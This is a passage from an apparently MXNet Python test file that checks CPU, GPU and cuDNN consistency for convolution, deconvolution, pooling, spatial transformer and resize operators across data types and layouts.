widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
@pytest.mark.serial
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
@pytest.mark.serial
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
@pytest.mark.serial
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
@pytest.mark.serial
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
@pytest.mark.serial
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
    # While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
    # While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
@pytest.mark.serial
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
                # Add the pad and stride params when they are non-default, and also randomly even when they match the defaults
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
        # Make sure the kernel is ignored when global_pool=True by sometimes setting it to an oversized value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
    # For the cases in which all implementations should match: the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
        # Double the float16 tol when comparing v1 and non-v1 implementations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
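# Illustrative sketch (ours, not invoked by the tests) of note 3 in the comment block of
# test_pooling_versions above: with padding, 'avg' pooling divides by the full window size
# when count_include_pad=True but only by the number of real (non-padded) inputs when
# count_include_pad=False, which is why the 'v1' operator is excluded from that comparison.
def _count_include_pad_sketch():
    # 1x1x1x3 NCHW input with kernel (1,3) and pad (0,1): the left-most window sees [pad, 1, 2].
    x = mx.nd.array([[[[1.0, 2.0, 3.0]]]])
    incl = mx.nd.Pooling(x, kernel=(1, 3), pad=(0, 1), stride=(1, 1), pool_type='avg',
                         count_include_pad=True)
    excl = mx.nd.Pooling(x, kernel=(1, 3), pad=(0, 1), stride=(1, 1), pool_type='avg',
                         count_include_pad=False)
    assert abs(incl.asnumpy()[0, 0, 0, 0] - (0.0 + 1.0 + 2.0) / 3) < 1e-6
    assert abs(excl.asnumpy()[0, 0, 0, 0] - (1.0 + 2.0) / 2) < 1e-6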
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
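# A minimal helper sketch (ours, unused by the tests) of the output-size arithmetic in the
# o_h / o_w comments of test_pooling_full_2d above: the 'valid' convention floors and the
# 'full' convention ceils (size + 2*pad - kernel) / stride before adding 1.
def _pool_out_size_sketch(size, kernel, pad, stride, convention='valid'):
    span = size + 2 * pad - kernel
    n = -(-span // stride) if convention == 'full' else span // stride  # ceil vs. floor
    return n + 1
# e.g. _pool_out_size_sketch(10, 4, 1, 3, 'full') == 4 and
#      _pool_out_size_sketch(10, 5, 2, 4, 'full') == 4, matching the commented values.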
@with_seed()
@pytest.mark.serial
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.serial
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
